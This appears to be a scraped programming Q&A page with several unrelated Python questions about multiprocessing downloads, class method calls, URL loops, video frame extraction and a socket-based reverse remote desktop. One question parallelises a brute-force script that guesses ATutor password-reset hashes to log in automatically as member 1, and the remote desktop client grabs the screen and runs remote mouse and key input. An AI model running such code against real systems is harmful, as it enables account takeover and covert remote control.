MaybeEncodingError: Error sending result: '<multiprocessing.pool.ExceptionWithTraceback object at 0x0000018F09F334A8>'

I am getting the error below when downloading files using multiprocessing. I am downloading Wikipedia page views, and since they are published per hour, this can involve a lot of downloads.
Any recommendation as to why this error occurs and how to solve it? Thanks.
MaybeEncodingError: Error sending result:
'<multiprocessing.pool.ExceptionWithTraceback object at 0x0000018F09F334A8>'.
Reason: 'TypeError("cannot serialize '_io.BufferedReader' object",)'
import fnmatch
import requests
import urllib.request
from bs4 import BeautifulSoup
import multiprocessing as mp

def download_it(download_file):
    global path_to_save_document
    filename = download_file[download_file.rfind("/")+1:]
    save_file_w_submission_path = path_to_save_document + filename
    request = urllib.request.Request(download_file)
    response = urllib.request.urlopen(request)
    data_content = response.read()
    with open(save_file_w_submission_path, 'wb') as wf:
        wf.write(data_content)
    print(save_file_w_submission_path)

pattern = r'*200801*'
url_to_download = r'https://dumps.wikimedia.org/other/pagecounts-raw/'
path_to_save_document = r'D:\Users\Jonathan\Desktop\Wikipedia\\'

def main():
    global pattern
    global url_to_download
    r = requests.get(url_to_download)
    data = r.text
    soup = BeautifulSoup(data, features="lxml")
    list_of_href_year = []
    for i in range(2):
        if i == 0:
            for link in soup.find_all('a'):
                lien = link.get('href')
                if len(lien) == 4:
                    list_of_href_year.append(url_to_download + lien + '/')
        elif i == 1:
            list_of_href_months = []
            list_of_href_pageviews = []
            for loh in list_of_href_year:
                r = requests.get(loh)
                data = r.text
                soup = BeautifulSoup(data, features="lxml")
                for link in soup.find_all('a'):
                    lien = link.get('href')
                    if len(lien) == 7:
                        list_of_href_months.append(loh + lien + '/')
            if not list_of_href_months:
                continue
            for lohp in list_of_href_months:
                r = requests.get(lohp)
                data = r.text
                soup = BeautifulSoup(data, features="lxml")
                for link in soup.find_all('a'):
                    lien = link.get('href')
                    if "pagecounts" in lien:
                        list_of_href_pageviews.append(lohp + lien)
    matching_list_of_href = fnmatch.filter(list_of_href_pageviews, pattern)
    matching_list_of_href.sort()
    with mp.Pool(mp.cpu_count()) as p:
        print(p.map(download_it, matching_list_of_href))

if __name__ == '__main__':
    main()

As Darkonaut proposed, I used multithreading instead.
Example:
from multiprocessing.dummy import Pool as ThreadPool

'''This function downloads the files using multithreading'''
def multithread_download_files_func(self, download_file):
    try:
        filename = download_file[download_file.rfind("/")+1:]
        save_file_w_submission_path = self.ptsf + filename
        '''Check if the download doesn't already exist. If not, proceed; otherwise skip'''
        if not os.path.exists(save_file_w_submission_path):
            data_content = None
            try:
                '''Let's download the file'''
                request = urllib.request.Request(download_file)
                response = urllib.request.urlopen(request)
                data_content = response.read()
            except urllib.error.HTTPError:
                '''We will retry the download if the server is temporarily unavailable'''
                retries = 1
                success = False
                while not success:
                    try:
                        '''Make another request if the previous one failed'''
                        response = urllib.request.urlopen(download_file)
                        data_content = response.read()
                        success = True
                    except Exception:
                        '''Make the program wait a bit before sending another request to download the file'''
                        wait = retries * 5
                        time.sleep(wait)
                        retries += 1
            except Exception as e:
                print(str(e))
            '''If the response data is not empty, write it as a new file stored in the data lake folder'''
            if data_content:
                with open(save_file_w_submission_path, 'wb') as wf:
                    wf.write(data_content)
                print(self.present_extract_RC_from_RS + filename)
    except Exception as e:
        print('funct multithread_download_files_func' + str(e))

'''This function is used as a wrapper before using multithreading in order to download the files to be stored in the Data Lake'''
def download_files(self, filter_files, url_to_download, path_to_save_file):
    try:
        self.ptsf = path_to_save_file = path_to_save_file + 'Step 1 - Data Lake\Wikipedia Pagecounts\\'
        filter_files_df = filter_files
        self.filter_pattern = filter_files
        self.present_extract_RC_from_RS = 'WK Downloaded-> '
        if filter_files_df == '*':
            '''We will create a string of all the years concatenated together for later use in this program'''
            reddit_years = [2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018]
            filter_files_df = ''
            '''Go through the years from 2005 to 2018'''
            for idx, ry in enumerate(reddit_years):
                filter_files_df += '*' + str(ry) + '*'
                if idx != len(reddit_years) - 1:
                    filter_files_df += '&'
        download_filter = list([x.strip() for x in filter_files_df.split('&')])
        download_filter.sort()
        '''If the folder doesn't exist, create one'''
        if not os.path.exists(os.path.dirname(self.ptsf)):
            os.makedirs(os.path.dirname(self.ptsf))
        '''We will get the website's HTML elements using the beautifulsoup library'''
        r = requests.get(url_to_download)
        data = r.text
        soup = BeautifulSoup(data, features="lxml")
        list_of_href_year = []
        for i in range(2):
            if i == 0:
                '''Let's get all hrefs available on this particular page. The first page is the year page'''
                for link0 in soup.find_all('a'):
                    lien0 = link0.get('href')
                    '''We will check if the length is 4, which corresponds to a year'''
                    if len(lien0) == 4:
                        list_of_href_year.append(url_to_download + lien0 + '/')
            elif i == 1:
                list_of_href_months = []
                list_of_href_pageviews = []
                for loh in list_of_href_year:
                    r1 = requests.get(loh)
                    data1 = r1.text
                    '''Get the webpage HTML tags'''
                    soup1 = BeautifulSoup(data1, features="lxml")
                    for link1 in soup1.find_all('a'):
                        lien1 = link1.get('href')
                        '''We will check if the length is 7, which corresponds to the year and month'''
                        if len(lien1) == 7:
                            list_of_href_months.append(loh + lien1 + '/')
                for lohm in list_of_href_months:
                    r2 = requests.get(lohm)
                    data2 = r2.text
                    '''Get the webpage HTML tags'''
                    soup2 = BeautifulSoup(data2, features="lxml")
                    for link2 in soup2.find_all('a'):
                        lien2 = link2.get('href')
                        '''We will now get every href that contains "pagecounts" in its name. The files are per hour, so 24 hours is 24 files,
                        and per year that is at least 24*365 = 8760 files'''
                        if "pagecounts" in lien2:
                            list_of_href_pageviews.append(lohm + lien2)
        existing_file_list = []
        for file in os.listdir(self.ptsf):
            filename = os.fsdecode(file)
            existing_file_list.append(filename)
        '''Filter the links'''
        matching_fnmatch_list = []
        if filter_files != '':
            for dfilter in download_filter:
                fnmatch_list = fnmatch.filter(list_of_href_pageviews, dfilter)
                i = 0
                for fnl in fnmatch_list:
                    '''Break for demo purposes only'''
                    if self.limit_record != 0:
                        if (i == self.limit_record) and (i != 0):
                            break
                    i += 1
                    matching_fnmatch_list.append(fnl)
        '''If the user stated a filter, remove from the list the files which fall outside that filter'''
        to_remove = []
        for efl in existing_file_list:
            for mloh in matching_fnmatch_list:
                if efl in mloh:
                    to_remove.append(mloh)
        '''Remove the files which were found outside the filter'''
        for tr in to_remove:
            matching_fnmatch_list.remove(tr)
        matching_fnmatch_list.sort()
        '''Thread pool of 200'''
        p = ThreadPool(200)
        p.map(self.multithread_download_files_func, matching_fnmatch_list)
    except Exception as e:
        print('funct download_files' + str(e))

From the accepted answer, I understood that it is simply a matter of replacing from multiprocessing import Pool with from multiprocessing.dummy import Pool.
This worked for me.
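To make the swap concrete, here is a minimal sketch (the worker body and the URL list are illustrative stand-ins, not the code from this question). multiprocessing.dummy exposes the same Pool API backed by threads, so return values stay inside one process and never have to be pickled, which is what raised the "cannot serialize '_io.BufferedReader'" error:

from multiprocessing.dummy import Pool as ThreadPool  # was: from multiprocessing import Pool
import urllib.request

def download_it(url):
    # I/O-bound worker: threads suit this despite the GIL,
    # since the lock is released while waiting on the network
    with urllib.request.urlopen(url) as response:
        return url, len(response.read())

if __name__ == '__main__':
    urls = ['https://dumps.wikimedia.org/other/pagecounts-raw/']  # placeholder link
    with ThreadPool(4) as pool:
        print(pool.map(download_it, urls))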

Related

How to Call function from another function [duplicate]

This question already has answers here: How can I call a function within a class? (2 answers)
I tried to call a function from another function, but it returns an error.
class Data_Wrangling:
    def __init__(self):
        self.ClassName = type(self).__name__ + '.'
        self.Host = None
        self.App_Id = None
        self.App_Secret = None
        self.PySpace = None

    def Data_Retrieve(self, URL):
        print('\n<> ' + inspect.currentframe().f_code.co_name)
        JsonData = None
        ST = time.time()
        while JsonData is None:
            try:
                Response = requests.get(URL)
            except Exception as E:
                print('\n>> Failed: ' + str(E))
                if (time.time() - ST)/60 > 1:
                    print('\n>> Failed: NO valid JsonData Retrieved - Source Down or Internet Issue, etc')
                    break
                JsonData = None
                continue
            if Response.status_code == 200:
                try:
                    JsonData = json.loads(Response.content.decode('utf-8'))
                except Exception as E:
                    print('\n>> Failed: ' + str(E))
                    JsonData = None
                    continue
        KN.TPE(ST)
        return JsonData

    def Processing(self, DatasetId):
        Start_Date = '1900-01'
        today = datetime.today()
        End_Range = str(today.year) + '-' + str(today.month)
        Limit = 5000
        Page = 1
        URL_Part1 = 'https://maps.clb.org.hk/map/pageList?keyword=&startDate='
        URL_Part2 = '&endDate='
        URL_Part3 = '&address=&industry=&parentIndustry=&industryName=&accidentType=&accidentTypeName=&companyOwnership=&companyOwnershipName=&deathsNumber=&deathsNumberName=&injuriesNumber=&injuriesNumberName=&mapType=2&page='
        URL_Part4 = '&limit='
        URL = URL_Part1 + Start_Date + URL_Part2 + End_Range + URL_Part3 + str(Page) + URL_Part4 + str(Limit)
        JsonData = Data_Retrieve(URL)

DW = Data_Wrangling()
Export_FilePath = DW.Processing('dtihwnb')
I receive the error:
JsonData = Data_Retrieve(URL)
NameError: name 'Data_Retrieve' is not defined
I am stuck here, wondering what mistake I have made. I am calling Data_Retrieve in Processing; please help.
You need to call the Data_Retrieve method using self, because it is defined inside the class.
Try calling your method like this:
JsonData = self.Data_Retrieve(URL)
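A minimal, self-contained illustration of the same rule (the class and method names here are made up):

class Demo:
    def helper(self, url):
        # an instance method lives in the class namespace,
        # so it is reached through self, not as a bare name
        return 'fetched ' + url

    def run(self):
        # calling helper(url) here would raise
        # NameError: name 'helper' is not defined
        return self.helper('https://example.com')

print(Demo().run())  # -> fetched https://example.com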

Converting Existing Python3 Method to Use Multiprocessing

I have a method that iterates through a load of values and sends a requests call for each. This works fine; however, it takes a long time. I want to speed this up using multiprocessing in Python 3.
My question is: what is the correct way to implement this using multiprocessing so I can speed up these requests?
The existing method is as so:
def change_password(id, prefix_length):
    count = 0
    # e = None
    # m = 0
    for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
        # code = f'{word}{id}'
        h = hash_string(word)[0:10]
        url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
        print(f"Issuing reset request with: {h}")
        proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
        s = requests.Session()
        res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
        if res.status_code == 302:
            return True, s.cookies, count
        else:
            count += 1
    return False, None, count
I have tried to convert it based on the first example in the Python 3 docs here; however, it just seems to hang when I start the script. No doubt I have implemented it incorrectly:
def send_request(word):
    # code = f'{word}{id}'
    h = hash_string(word)[0:10]
    url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
    print(f"Issuing reset request with: {h}")
    proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
    s = requests.Session()
    res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
    if res.status_code == 302:
        return True, word
    else:
        return False
It is being called from a modified version of the original method, like so:
def change_password(id, prefix_length):
    count = 0
    # e = None
    # m = 0
    words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
    with Pool(10) as pool:
        results, word = pool.map(send_request, words)
        if results:
            return True, word
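One thing worth noting about the attempt above: pool.map returns a list with one return value per input, so unpacking it into results, word will not do what is intended. A minimal sketch of iterating the mapped results instead (send_request here is a stand-in that always returns a two-element tuple, unlike the version above, which sometimes returns a bare False):

from multiprocessing import Pool

def send_request(word):
    # stand-in worker: always return a (success, payload) tuple
    # so every result can be unpacked uniformly
    return (word == 'ab', word)

if __name__ == '__main__':  # required: workers are spawned as separate processes
    words = ['aa', 'ab', 'ac']
    with Pool(3) as pool:
        for ok, word in pool.map(send_request, words):
            if ok:
                print('match found:', word)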

How do I Count up in a url while capturing source code

I want to loop through a number of URL requests, but I'm having an issue: when I run the code, it doesn't loop through all the numbers and only requests the page once.
So my question is: how do I loop through the numbers in the URL while requesting each one and capturing all the source code I need? Everything works except the counting.
This is the code I have managed to write so far:
import urllib.request
import re

count = 1
while count <= 44:
    url = ('https://example/page=%i' % count)
    count += 1
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td', str(respData))
for eachP in paragraphs:
    print(eachP)
There is a problem in your loop: you iterate over all 44 URLs, but request only the last one. This is a correct implementation:
import urllib.request
import re

def handle_url(url):
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td', str(respData))
    for eachP in paragraphs:
        print(eachP)

count = 1
while count <= 44:
    handle_url('https://example/page=%i' % count)
    count += 1
If you don't like the function, you can simply move everything into the while loop:
import urllib.request
import re

count = 1
while count <= 44:
    url = 'https://example/page=%i' % count
    count += 1
    req = urllib.request.Request(url)
    resp = urllib.request.urlopen(req)
    respData = resp.read()
    paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td', str(respData))
    for eachP in paragraphs:
        print(eachP)
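As a side note, the counting itself is usually written with range, which removes the manual increment entirely; a sketch of the same loop in that style (same placeholder URL as above):

import urllib.request
import re

# range(1, 45) yields 1 through 44, so no manual count += 1 is needed
for count in range(1, 45):
    url = 'https://example/page=%i' % count
    with urllib.request.urlopen(url) as resp:
        respData = resp.read()
    for eachP in re.findall(r';"><span>(.*?)</span></a></td><td', str(respData)):
        print(eachP)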

Do not process already present data

I have a folder in which there are some video files. I want to extract frames from the videos, but only those videos whose names are not present in the csv should be processed. The code should check the csv for existing video file names before processing the videos.
def extractFrames(m):
    global vid_name
    vid_files = glob(m)
    print(vid_files)
    complete_videos = get_completed_videos()
    print(complete_videos)
    new_vid_files = [x for x in vid_files if get_vid_name(x) not in complete_videos]
    for vid in new_vid_files:
        print("path of video========>>>>.", vid)
        v1 = os.path.basename(vid)
        try:
            vid_name = get_vid_name(vid)
            vidcap = cv2.VideoCapture(vid)
        except cv2.error as e:
            print(e)
        except:
            print('error')
        #condition
        fsize = os.stat(vid)
        print('=============size of video ===================:', fsize.st_size)
        try:
            if fsize.st_size > 1000:
                fps = vidcap.get(cv2.CAP_PROP_FPS)  # OpenCV version 2 used "CV_CAP_PROP_FPS"
                frameCount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
                duration = frameCount / fps
                minutes = int(duration / 60)
                print('fps = ' + str(fps))
                print('number of frames = ' + str(frameCount))
                print('duration (S) = ' + str(duration))
                if duration > 1:
                    success, image = vidcap.read()
                    count = 0
                    success = True
                    while success:
                        img_name = vid_name + '_f' + str(count) + ".jpg"
                        success, image = vidcap.read()
                        if count % 10 == 0 or count == 0:
                            target_non_target(img_name, image)
                        count += 1
                    vidcap.release()
                    cv2.destroyAllWindows()
        except:
            print("error")
        print('finished processing video ', vid)
        with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\" + 'video_info.csv', 'a') as csv_file:
            fieldnames = ['Video_Name', 'Process']
            file_is_empty = os.stat("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\" + 'video_info.csv').st_size == 0
            writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
            if file_is_empty:
                writer.writeheader()
            writer.writerow({'Video_Name': vid_name, 'Process': 'done'})

def get_vid_name(vid):
    return os.path.splitext(os.path.basename(vid))[0]

def get_completed_videos():
    completed_videos = []
    with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\video_info.csv") as csv_file:
        for row in csv.reader(csv_file):
            for col in range(0, len(row)):
                try:
                    completed_videos.append(row[col])
                except Exception as e:
                    print(str(e))
    print(completed_videos[0])
    return completed_videos
Suppose there are 3 videos in a folder. The code runs successfully for those 3 videos and their names are written to the csv. Now if I paste a 4th video into the folder, it should process only the 4th video after checking the video names present in the csv. Currently it repeatedly processes all the video files every time the script is run.
First off, inside the for loop,
v1 = os.path.basename(vid_files[v_f])
should be
v1 = os.path.basename(new_vid_files[v_f])
since you are looping over the new_vid_files range; using those indices on the original list will give you unexpected items. Better yet, you can directly use a for-each loop (since you don't seem to be using v_f for anything other than list access) as follows:
for vid in new_vid_files:
and this vid would replace all instances of new_vid_files[v_f].
Next, you are using vid_name to write to the csv, so you need to perform the same operation for each item from vid_files before matching against complete_videos while creating the new_vid_files list.
If you create a method for getting the video name as follows:
def get_vid_name(vid_file):
return os.path.splitext(os.path.basename(vid_file))[0]
Then you can change the list comprehension to be
new_vid_files = [x for x in vid_files if get_vid_name(x) not in complete_videos]
Edit: As mentioned in the comments to the other answer, the output for complete_videos indicates it isn't being parsed properly. It is appending both the column headers and other unneeded columns. This code will work despite that, but it needs to be fixed. I am not solving it because it is a relatively simple change, and I want the OP to understand what they're doing wrong.
def extractFrames(m):
    global vid_name
    vid_files = glob(m)
    print(vid_files)
    complete_videos = get_completed_videos()
    new_vid_files = [x for x in vid_files if get_vid_name(x) not in complete_videos]
    for vid in new_vid_files:
        print("path of video========>>>>.", vid)
        v1 = os.path.basename(vid)
        try:
            vid_name = get_vid_name(vid)
            vidcap = cv2.VideoCapture(vid)
        except cv2.error as e:
            print(e)
        except:
            print('error')
        #condition
        fsize = os.stat(vid)
        print('=============size of video ===================:', fsize.st_size)
        try:
            if fsize.st_size > 1000:
                fps = vidcap.get(cv2.CAP_PROP_FPS)  # OpenCV version 2 used "CV_CAP_PROP_FPS"
                frameCount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
                duration = frameCount / fps
                minutes = int(duration / 60)
                print('fps = ' + str(fps))
                print('number of frames = ' + str(frameCount))
                print('duration (S) = ' + str(duration))
                if duration > 1:
                    success, image = vidcap.read()
                    count = 0
                    success = True
                    while success:
                        img_name = vid_name + '_f' + str(count) + ".jpg"
                        success, image = vidcap.read()
                        if count % 10 == 0 or count == 0:
                            target_non_target(img_name, image)
                        count += 1
                    vidcap.release()
                    cv2.destroyAllWindows()
        except:
            print("error")
        print('finished processing video ', vid)
        with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\" + 'video_info.csv', 'a') as csv_file:
            fieldnames = ['Video_Name', 'Process']
            file_is_empty = os.stat("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\" + 'video_info.csv').st_size == 0
            writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
            if file_is_empty:
                writer.writeheader()
            writer.writerow({'Video_Name': vid, 'Process': 'done'})

def get_vid_name(vid):
    return os.path.splitext(os.path.basename(vid))[0]

def get_completed_videos():
    completed_videos = []
    with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\video_info.csv") as csv_file:
        for row in csv.reader(csv_file):
            for col in range(0, len(row)):
                try:
                    completed_videos.append(row[col])
                except Exception as e:
                    print(str(e))
    print(completed_videos[0])
    return completed_videos

python 2.7 thread not running correctly

I have been fighting with a threaded send of a string image over Python sockets for a while now and have had no luck with this issue.
The code for the client side is:
import socket
from PIL import ImageGrab  # windows only screenshot
from threading import Thread
import win32api, win32con
import re
import win32com.client
import getpass
import time
import select

shell = win32com.client.Dispatch("WScript.Shell")
host = raw_input("SERVER:")
dm = win32api.EnumDisplaySettings(None, 0)
dm.PelsHeight = 800
dm.PelsWidth = 600
win32api.ChangeDisplaySettings(dm, 0)
port = 9000

def picture():
    while 1:
        image = ImageGrab.grab().resize((800,600))  # send screen as string
        data = image.tostring()
        sendme = (data)
        try:
            s.sendall(sendme)
            print ("sent")
        except socket.error as e:
            print e
        except Exception as e:
            print e

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
pict = Thread(target=picture)
pict.start()

while 1:
    socket_list = [s]
    # Get the list of sockets which are readable
    read_sockets, write_sockets, error_sockets = select.select(socket_list, [], [])
    for sock in read_sockets:
        if sock == s:
            data = sock.recv(1024)
            print data
            if "LEFTC" in data:
                data = data.replace("LEFTC", "")
                x = re.findall(r'X(.*?)Y', data)
                y = re.findall(r'Y(.*?)EOC', data)
                x = str(x)
                y = str(y)
                # REPLACE CODE TO BE REWRITTEN
                x = x.replace("[", "").replace("]", "").replace("'", "").replace(" ", "")
                y = y.replace("[", "").replace("]", "").replace("'", "").replace(" ", "")
                print(str(x) + ' X\n')
                print(str(y) + ' Y\n')
                try:
                    win32api.SetCursorPos((int(x), int(y)))  # click time
                    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN, int(x), int(y), 0, 0)
                    win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP, int(x), int(y), 0, 0)
                except Exception as e:
                    print e
            elif "RIGHTC" in data:
                data = data.replace("RIGHTC", "")
                x = re.findall(r'X(.*?)Y', data)
                y = re.findall(r'Y(.*?)EOC', data)
                x = str(x)
                y = str(y)
                # REPLACE FUNCTION MARKED FOR REWRITE
                x = x.replace("[", "").replace("]", "").replace("'", "").replace(" ", "")
                y = y.replace("[", "").replace("]", "").replace("'", "").replace(" ", "")
                print(str(x) + ' X\n')
                print(str(y) + ' Y\n')
                try:  # click
                    win32api.SetCursorPos((int(x), int(y)))
                    win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN, int(x), int(y), 0, 0)
                    win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP, int(x), int(y), 0, 0)
                except Exception as e:
                    print e
            else:
                # This does not work correctly: only BACKSPACE and the else branch are working.
                if "CAPS" in data:
                    shell.SendKeys('{CAPSLOCK}')
                elif "CAPSOFF" in data:
                    shell.SendKeys('{CAPSLOCK}')
                elif "BACKSPACE" in data:
                    shell.SendKeys('{BACKSPACE}')
                elif "SHIFT" in data:
                    shell.SendKeys('+' + data)
                else:
                    shell.SendKeys(data)
    time.sleep(0.1)
The server code is:
import socket
import pygame
from pygame.locals import *
from threading import Thread

x = y = 0
host = ""
# port defined here
port = 9000
# This list is used to make the library more pythonic and compact. This also leads to less source code.
keylist = [pygame.K_a,pygame.K_b,pygame.K_c,pygame.K_d,pygame.K_e,pygame.K_f,pygame.K_g,pygame.K_h,pygame.K_i,pygame.K_j,pygame.K_k,pygame.K_l,pygame.K_m,pygame.K_n,pygame.K_o,pygame.K_p,pygame.K_q,pygame.K_r,pygame.K_s,pygame.K_t,pygame.K_u,pygame.K_v,pygame.K_w,pygame.K_x,pygame.K_y,pygame.K_z]
key = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0']

# i/o function
def ioinput(sock):
    while 1:
        evt = pygame.event.poll()  # has to be in the same while loop as the evt calls or it won't work.
        if evt.type == pygame.MOUSEBUTTONDOWN and evt.button == 1:  # 1 for left
            x, y = evt.pos
            command = ("LEFTC" + " " + "X" + str(x) + "Y" + str(y) + "EOC")
            sock.sendall(command)
        elif evt.type == pygame.MOUSEBUTTONDOWN and evt.button == 3:  # 3 for right; 2 is middle, support for which comes later.
            x, y = evt.pos
            command = ("RIGHTC" + " " + "X" + str(x) + "Y" + str(y) + "EOC")
            sock.sendall(command)
        elif evt.type == pygame.KEYDOWN:
            keyname = pygame.key.name(evt.key)
            if evt.key == pygame.K_BACKSPACE:
                command = ("BACKSPACE")
                sock.sendall(command)
            elif evt.key in keylist:
                if keyname in key:
                    command = (keyname)
                    sock.sendall(command)

def mainloop():
    message = []
    while 1:
        try:
            while True:
                try:
                    conn, addr = server.accept()
                except socket.error:
                    break
                screen = pygame.display.set_mode((800,600))
                clickctrl = Thread(target=ioinput, args=(conn,))
                clickctrl.start()
                while 1:
                    d = conn.recv(1024*1024*1)
                    if not d:
                        break
                    else:
                        message.append(d)
                    data = ''.join(message)
                    image = pygame.image.frombuffer(data,(800,600),"RGB")
                    screen.blit(image,(0,0))
                    pygame.display.flip()
        except Exception as e:
            continue

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.setblocking(False)
server.bind((host, port))
server.listen(55000)
print "Listening on %s" % ("%s:%s" % server.getsockname())

# Main event loop.
mainloop()
The picture thread will run three to six times and then die; however, the keyboard and mouse input layer continues to operate. I suspect that the GIL is getting in my way. Am I correct, or am I missing something really simple here? This program is supposed to be a simplistic reverse remote desktop application.
I found the problem after speaking with a good friend. It turns out that my server-side while loop was set up so that it would break.
I fixed this by changing:
while 1:
    d = conn.recv(1024*1024*1)
    if not d:
        break
    else:
        message.append(d)
    data = ''.join(message)
    image = pygame.image.frombuffer(data,(800,600),"RGB")
    screen.blit(image,(0,0))
    pygame.display.flip()
to:

while 1:
    d = conn.recv(1024*1024*1)
    message.append(d)
    try:
        print("attempting to parse..")
        data = ''.join(message)
        image = pygame.image.frombuffer(data,(800,600),"RGB")
        screen.blit(image,(0,0))
        pygame.display.flip()
        print("recieved pic")
    except Exception as e:
        print e
        continue
Also, on the client side, in the picture thread, I added a time.sleep(1) after the exception handling; otherwise the image does not come through correctly. The amended loop is sketched below.
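A sketch of where that pause sits in the picture thread (reconstructed from the description above, not copied verbatim from the working program):

def picture():
    while 1:
        image = ImageGrab.grab().resize((800,600))  # grab and shrink the screen
        data = image.tostring()
        try:
            s.sendall(data)
            print ("sent")
        except socket.error as e:
            print e
        except Exception as e:
            print e
        time.sleep(1)  # added pause: without it the frames do not arrive intact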
